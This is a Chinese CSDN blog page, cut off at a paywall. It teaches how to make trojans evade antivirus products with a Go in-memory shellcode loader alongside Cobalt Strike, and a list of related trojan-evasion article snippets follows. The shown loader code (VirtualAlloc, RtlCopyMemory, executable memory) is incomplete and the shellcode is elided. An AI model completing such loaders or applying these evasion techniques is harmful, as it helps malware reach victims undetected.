一文带你学会0编程基础做木马免杀

最新推荐文章于 2024-09-26 02:11:45 发布
最新推荐文章于 2024-09-26 02:11:45 发布
阅读量805 收藏 4
点赞数 1
分类专栏: 技术干货
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/119750350
版权
本文介绍了如何使用Go语言编写内存加载的木马以实现免杀,包括环境配置、免杀思路、编码解码执行shellcode的实践过程,以及面对杀软的应对策略。通过实例和代码展示,帮助读者理解免杀技巧。
摘要由CSDN通过智能技术生成 
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一

作者:掌控安全-骚骑

背景

之前分享了个免杀入门文,很浅显,比较适合小白看…

文章在社区,地址我放在这了,有兴趣可以一戳:

https://bbs.zkaq.cn/t/4456.html (ps:社区邀请码可以文末扫码找助教领取,社区投稿还有钱赚)

这次实实在在写一个,能过微软自带def,火绒,卡巴这些!

一、0x01环境

靶机:

IP:192.168.111.10

杀软:火绒,360,卡巴,微软def

本机:

IP:192.168.111.11

安装环境:cobaltstrike,go环境

二、go环境安装

由于本人很久之前就安装了,所以直接上菜鸟教程吧

https://www.runoob.com/go/go-environment.html

三、实践

1.思路

主要是内存加载,对shellcode预先编码,然后解码执行。

2.举例

因为不是每个人每种语言都精通,但是当我们有需要了的时候怎么办?

我的方法就是找个案例,然后将不懂的函数查清楚,进而开始针对个人想要的功能进行修改或者拓展。

用重剑无锋大佬的文章中的案例做个示范:

远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)

https://github.com/TideSec/BypassAntiVirus/

package main

import (
 "io/ioutil"
 "os"
 "syscall"
 "unsafe"
)

const (
 MEM_COMMIT = 0x1000
 MEM_RESERVE = 0x2000
 PAGE_EXECUTE_READWRITE = 0x40
)

var (
 kernel32 = syscall.MustLoadDLL("kernel32.dll")
 ntdll = syscall.MustLoadDLL("ntdll.dll")
 VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
 RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
 shellcode_buf = []byte{
    
 0xfc, 0x48, ----shellcode----, 0xd5,
最低0.47元/天 解锁文章
一文你了解Java编程语言的前世今生 | Java核心知识点整理
努力是为了站在万人之中,成为别人的光
07-12 1万+
他们质疑你,嘲讽你,却又想成为你,取代你。 Java 是由 Sun Microsystems 公司于 1995 年 5 月推出的高级程序设计语言。 Java 可运行于多个平台,如 Windows, Mac OS 及其他多种 UNIX 版本的系统。它伴随着互联网的迅猛发展而发展,逐渐成为重要的网络编程语言。自诞生至今,还产生了无数和Java相关的产品、技术和标准。下面简要回顾一下Java的技术体系和发展轨迹、历史变迁 一、为什么 Java 要叫 Java(咖啡)? 二、Java 标准划分 三、Java 语言的
一文你了解三大开源关系型数据库:SQLite、MySQL和PostgreSQL
热门推荐
dvlinker的技术专栏
10-08 4万+
一文你了解三大开源关系型数据库:SQLite、MySQL和PostgreSQL。
木马免杀基础学习
fa1lr4in的小博客
07-13 937
参考书籍:《木马攻防全攻略》 --万立夫编著 --电脑报电子音像出版社 参考链接:https://www.52pojie.cn/thread-32064-1-1.html 推荐的免杀思路链接:http://www.cnhonkerarmy.com/thread-187791-1-1.html http://www.cnhonkerarmy.com/forum.php?fromuid=...
木马免杀方式
Shinyhuang_的博客
01-05 6558
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
免杀笔记 ---> 无痕Hook?硬件断点 Syscall!
最新发布
huohaowen的博客
09-26 847
说到Hook,我们有很多Hook,像Inline-Hook,我们也是用的比较多,但是正如我上一篇Blog说的,他会对内存进行修改,如果EDR或者AV增加一个校验机制,不断检验某一块内存,那么就算你用syscall绕过了Ring3的Hook成功修改了内存也是会被扫描出来的!于是就有了今天的无痕Hook --->硬件断点其实也是小编收到了粉丝的建议,于是赶出来了那个代码,但是这个技术是未公开的,所以小编就不放代码,但是会公布部分,以及一些细节(我也不想这个技术那么快没用,望理解😋)
木马免杀浓缩精华版教程
07-13 850
木马免杀浓缩精华版教程木马免杀浓缩精华版教程第一部分:对国内外杀毒软件分析   在讲定位内存特征码前,先要分析国内外著名杀毒软件的内存查杀特点。大家在使用木马过程都会发现,内存查杀,一般都指得被瑞星的内存查杀。瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。像强悍的卡巴,金山,等等它们的内存查杀意义不大,会制作免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有
免杀学习-基础学习
weixin_41489908的博客
12-15 1729
女孩可以在社会上遇到比在学校更优秀的男生,而男生在社会上或许再也遇不到比学校里更优秀的女生了。。。 ---- 网易云热评 一、名词解释 单从汉语“免杀”的字面意思来理解,可以将其看为一种能使病毒木马避免被杀毒软件查杀的技术。但是不得不客观地说,免杀技术的涉猎面非常广,您可以由此轻松转型为反汇编、逆向工程甚至系统漏洞的发掘等其他顶级黑客技术,由此可见免杀并不简单。免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus..
木马免杀全攻略(转)
weixin_33737134的博客
10-21 716
《黑客X档案》 作者:A1Pass   大家好,很高兴又与大家见面了,不知道大家对上期的文章是否满意,但是木马免杀很多啊!可是我只介绍了可执行文件木马免杀这一种,而关于脚本木马免杀只字未提,真是惭愧……     在这篇文章里我会尽量补充上篇文章的不足,系统地介绍一下脚本木马免杀方法。     关于脚本木马的查杀原理与可执行文件木马大体相同,所以在这里就不再介绍杀毒软件的查杀原理了...
一文学会python新年倒计时
yj11290301的博客
12-22 1万+
快新年了~和学姐花了一下午出的新年倒计时,女朋友一看吃醋了。来看看和学姐如何研究的。
一文你了解QT Model/View框架的设计思想和实现机制
dvlinker的技术专栏
11-18 9478
详细讲述QT的Model/View框架的设计思想和实现机制。
一文你速通go语言指针
Hi,我是sharkchili,CSDN Java领域博客专家,开源项目JavaGuide维护人员,我想写一些有意思的东西,希望对你有帮助。
03-21 1万+
指针即指向变量的地址,在计算机宝贵的内存中存在成千上万的变量,对于某些可复用的变量,我们可以通过指针进行操作,避免拷贝的开销,从而提升系统的执行效率。
木马编程入门
12-09
木马 编程 入门 含 经典样本
【渗透实战】木马免杀
zkaqlaoniao的博客
11-14 2015
base64 sgn编码。
木马免杀(篇一)基础知识学习
Goodric的博客
08-09 2442
木马查杀和免杀技术是网络安全领域中一场持续的斗争。杀软不断更新自己的检测技术,而恶意软件开发者也在不断创新免杀技术,双方相互较劲。有效的木马查杀技术可以帮助保护系统免受威胁,而了解免杀技术也能帮助安全专家。同时技术不仅限于前面说到的几种,比如现在还会有人工智能与机器学习等更高级的技术去检测威胁。这里只是通过这几种典型的技术例子更好得理解木马的查杀与免杀
APT之木马静态免杀
Ba1_Ma0的博客
01-26 2385
只是利用指针执行函数过了大部分杀软,可是还是有一些过不了,但是我们可以打组合拳指针执行+类型转换将免杀率提升了一点,但是使用python免杀比使用c语言进行免杀方便除了xor加密,还可以使用aes之类的加密方式,也可以使用python里的Cryptography库进行加解密,大家可以自行研发绕过沙箱的方法还有很多,但是查系统状态也是敏感行为,不过不用担心其实还可以使用第三方工具进行免杀,但是这种方法太过脚本小子,工具的特征过不了多久就会被杀软发现,最好还是掌握自己写代码免杀的技巧。
木马免杀
一纸荒芜的博客
08-03 3014
木马免杀
木马免杀
ooowangyuan的专栏
02-03 584
木马免杀浓缩精华版教程第一部分:对国内外杀毒软件分析   在讲定位内存特征码前,先要分析国内外著名杀毒软件的内存查杀特点。大家在使用木马过程都会发现,内存查杀,一般都指得被瑞星的内存查杀。瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。像强悍的卡巴,金山,等等它们的内存查杀意义不大,会制作免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有内存查
木马免杀全攻略
tony的专栏
10-25 2157
木马免杀全攻略[续](图) 大家好,很高兴又与大家见面了,不知道大家对上期的文章是否满意,但是木马免杀很多啊!可是我只介绍了可执行文件木马免杀这一种,而关于脚本木马免杀只字未提,真是惭愧……'j6S-U1q:s5l在这篇文章里我会尽量补充上篇文章的不足,系统地介绍一下脚本木马免杀方法。$K0N4L'V z%s2Z关于脚本木马的查杀原理与可执行文件木马大体相同,所以在这里就不再介绍杀毒软件的
一文学会使用eclipse
05-03
Eclipse是一个开放源代码的集成开发环境(IDE),可用于Java开发,但也可以用于其他编程语言的开发。在本文中,我将向你展示如何使用Eclipse进行Java开发。 1. 下载Eclipse 首先,你需要从Eclipse官方网站下载Eclipse IDE。下载页面上将提供几个不同的版本,包括Eclipse IDE for Java Developers、Eclipse IDE for JavaScript and Web Developers,以及Eclipse IDE for C/C++ Developers等。选择适合你的版本,然后按照安装向导进行安装。 2. 创建Java项目 一旦你安装了Eclipse,你可以启动它并创建一个新的Java项目。选择“File”->“New”->“Java Project”,然后按照向导创建一个新的Java项目。在创建项目时,你需要指定项目名称、项目类型以及JRE版本等信息。 3. 创建Java类 一旦你创建了一个Java项目,你就可以创建一个Java类。选择你的Java项目,在“src”文件夹上右键单击,然后选择“New”->“Class”。输入类名和选择要继承的类(如果有的话),然后点击“Finish”。 4. 编写Java代码 现在你已经创建了一个Java类,可以开始编写Java代码了。在Eclipse的编辑器中,你可以输入Java代码并保存它。当你保存Java文件时,Eclipse会自动编译你的代码,并在Problems视图中显示任何编译错误。 5. 运行Java程序 一旦你编写了Java代码并保存了它,你可以运行Java程序。右键单击Java文件,然后选择“Run As”->“Java Application”。如果一切顺利,你的Java程序将在控制台中输出结果。 6. 调试Java程序 如果你的Java程序出现了错误或不按预期运行,你可以使用Eclipse的调试器来调试它。在Eclipse的编辑器中,你可以设置断点并启动调试器。当程序执行到断点时,调试器会暂停程序并允许你检查变量、运行代码等。 7. 导入外部JAR包 有时,你可能需要使用外部JAR包来完成你的Java项目。在Eclipse中,你可以简单地将外部JAR包导入到你的项目中。右键单击Java项目,然后选择“Build Path”->“Configure Build Path”。在“Libraries”选项卡上,你可以添加外部JAR包。 总结 在本文中,我们介绍了如何使用Eclipse进行Java开发。我们学习了如何创建Java项目、创建Java类、编写Java代码、运行Java程序、调试Java程序以及导入外部JAR包。Eclipse具有强大的功能,可以大大提高Java开发的效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值